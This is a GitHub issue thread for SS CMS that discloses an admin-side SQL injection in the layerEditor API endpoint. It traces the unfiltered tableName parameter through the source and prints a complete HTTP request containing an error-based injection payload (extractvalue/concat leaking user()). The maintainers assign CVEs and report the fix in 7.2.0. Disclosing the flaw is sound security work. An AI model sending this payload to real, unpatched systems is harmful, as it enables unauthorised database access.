search

siteserver / cms

SS CMS 基于 .NET Core,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。
https://sscms.com
GNU Affero General Public License v3.0
3.75k stars 1.22k forks source link

background sql inject #3490

Open nolan124 opened 2 years ago

nolan124 commented 2 years ago

this is Chaitin Security Research Lab find

starlying commented 2 years ago

cve-2022-0066 cve-2022-0067 cve-2022-0068

nolan124 commented 2 years ago

You need to apply to the CVE official

nolan124 commented 2 years ago

Environmental information:sscms7.1.3+mysql(background administrator)

Vulnerability details

api/admin/common/tableStyle/layerEditor

step1

\SSCMS.Web\Controllers\Admin\Common\TableStyle\LayerEditorController.Submit.cs#update function

image

step2

image

image

After entering the InsertObjectAsync method of \cms-sscms-v7.1.3\src\Datory\Utils\RepositoryUtils.Insert.cs

image

The table is directly passed into the sql statement without filtering Finally, the returned result has not yet been filtered and other operations on the sql statement resulting in the occurrence of sql vulnerabilities Vulnerability to reproduce

exploit result ` POST /api/admin/common/tableStyle/layerEditor HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 338 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU Content-Type: application/json;charset=UTF-8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Origin: http://192.168.3.129 Referer: http://192.168.3.129/ss-admin/common/tableStyleLayerEditor/?siteId=1&tableName=siteserver_Site&relatedIdentities=1%2C0&attributeName=weichat Accept-Encoding: gzip

{"attributeName":"weichat","customizeCode":null,"defaultValue":"1","displayName":"111","height":0,"helpText":"11","horizontal":false,"inputType":"Image","isRapid":true,"items":null,"rapidValues":"","relatedFieldId":null,"relatedIdentities":"1,0","tableName":"siteserver_Site'and/**/extractvalue(1,concat(char(126),user()))and'","taxis":1}

`

image
starlying commented 1 year ago

Fixed at 7.2.0, Thanks